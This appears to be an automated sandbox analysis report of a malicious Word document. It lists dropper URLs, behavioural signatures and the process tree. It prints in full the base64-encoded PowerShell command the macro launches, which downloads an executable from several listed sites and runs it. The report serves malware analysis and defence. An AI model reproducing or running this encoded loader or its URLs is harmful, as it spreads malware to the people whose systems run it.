Analysis

  • max time kernel
    61s
  • max time network
    9s
  • resource
    win7v191014
  • submitted
    06-02-2020 22:49

General

  • Target

    44522edda696ecf4d177282d77a1463aa7e32d38264a469db5f62b3caa378fff.doc

  • Sample

    200206-kwpaymjsh6

  • SHA256

    44522edda696ecf4d177282d77a1463aa7e32d38264a469db5f62b3caa378fff

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://supcargo.com/Login/K/

exe.dropper

http://sunucuo.com/wp-admin/0V0e/

exe.dropper

http://sweetestshop.ca/wp/3ca5oq/

exe.dropper

http://subhedarmarketing.com/2/7gtTEM8/

exe.dropper

http://takharandshankertour.com/wp-includes/IXR/2/

Signatures

  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\44522edda696ecf4d177282d77a1463aa7e32d38264a469db5f62b3caa378fff.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1128
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABaAHUAZQBlAG8AegBnAHMAaQA9ACcAQQBiAG8AagBmAHgAegBsACcAOwAkAFMAdQB5AHgAZwBzAGQAZwBrACAAPQAgACcANgA1ADcAJwA7ACQAQQBsAGgAaQBiAGMAcABoAGgAZQBxAHYAZAA9ACcAWQB4AGwAcwByAHoAZgByAHQAeABpAHgAbgAnADsAJABDAGcAYwBjAGwAbAB5AGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAdQB5AHgAZwBzAGQAZwBrACsAJwAuAGUAeABlACcAOwAkAFkAagB3AGEAdAB0AHcAZgB5AD0AJwBBAHQAeABqAGYAawB3AGgAJwA7ACQAUQB4AGcAYgBqAGcAdgB5AHAAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAGIAQwBsAGkAZQBOAHQAOwAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzAD0AJwBoAHQAdABwADoALwAvAHMAdQBwAGMAYQByAGcAbwAuAGMAbwBtAC8ATABvAGcAaQBuAC8ASwAvACoAaAB0AHQAcAA6AC8ALwBzAHUAbgB1AGMAdQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAFYAMABlAC8AKgBoAHQAdABwADoALwAvAHMAdwBlAGUAdABlAHMAdABzAGgAbwBwAC4AYwBhAC8AdwBwAC8AMwBjAGEANQBvAHEALwAqAGgAdAB0AHAAOgAvAC8AcwB1AGIAaABlAGQAYQByAG0AYQByAGsAZQB0AGkAbgBnAC4AYwBvAG0ALwAyAC8ANwBnAHQAVABFAE0AOAAvACoAaAB0AHQAcAA6AC8ALwB0AGEAawBoAGEAcgBhAG4AZABzAGgAYQBuAGsAZQByAHQAbwB1AHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEkAWABSAC8AMgAvACcALgAiAHMAYABQAEwAaQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAWgB5AHIAeQB2AHUAbwBsAD0AJwBDAGMAYgBmAGcAeQBkAHMAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBjAGgAeQBqAGkAbABuAG8AIABpAG4AIAAkAE8AcQByAGMAcgBxAGkAYQBsAHcAcABzACkAewB0AHIAeQB7ACQAUQB4AGcAYgBqAGcAdgB5AHAALgAiAGQATwBXAG4AbABPAEEAYABkAGAARgBJAEwAZQAiACgAJABFAGMAaAB5AGoAaQBsAG4AbwAsACAAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQATgBvAG8AegBsAHQAagByAHkAYQBnAGcAPQAnAEwAZgBiAHgAeQBpAHQAZgB5AHoAeQBzAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABDAGcAYwBjAGwAbAB5AGoAKQAuACIATABFAGAATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMgA0ADcAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIARQBhAFQAZQAiACgAJABDAGcAYwBjAGwAbAB5AGoAKQA7ACQARQBjAHcAawBtAGoAYwB6AGsAPQAnAFQAdQBlAHcAdgB4AGYAdgAnADsAYgByAGUAYQBrADsAJABWAGcAdQB4AGgAcQBvAGIAPQAnAEcAbABxAHcAZABrAHMAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAG4AeABkAGEAbAB0AGQAPQAnAE0AaABuAGYAagB3AGIAbQBlAHQAbgB4ACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:1972

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1128-0-0x0000000006240000-0x0000000006244000-memory.dmp
    Filesize

    16KB

  • memory/1128-1-0x0000000006421000-0x0000000006425000-memory.dmp
    Filesize

    16KB

  • memory/1128-2-0x0000000008DF0000-0x0000000008DF4000-memory.dmp
    Filesize

    16KB

  • memory/1128-3-0x0000000006421000-0x0000000006425000-memory.dmp
    Filesize

    16KB

  • memory/1128-7-0x0000000002300000-0x0000000002304000-memory.dmp
    Filesize

    16KB

  • memory/1128-8-0x0000000002380000-0x0000000002384000-memory.dmp
    Filesize

    16KB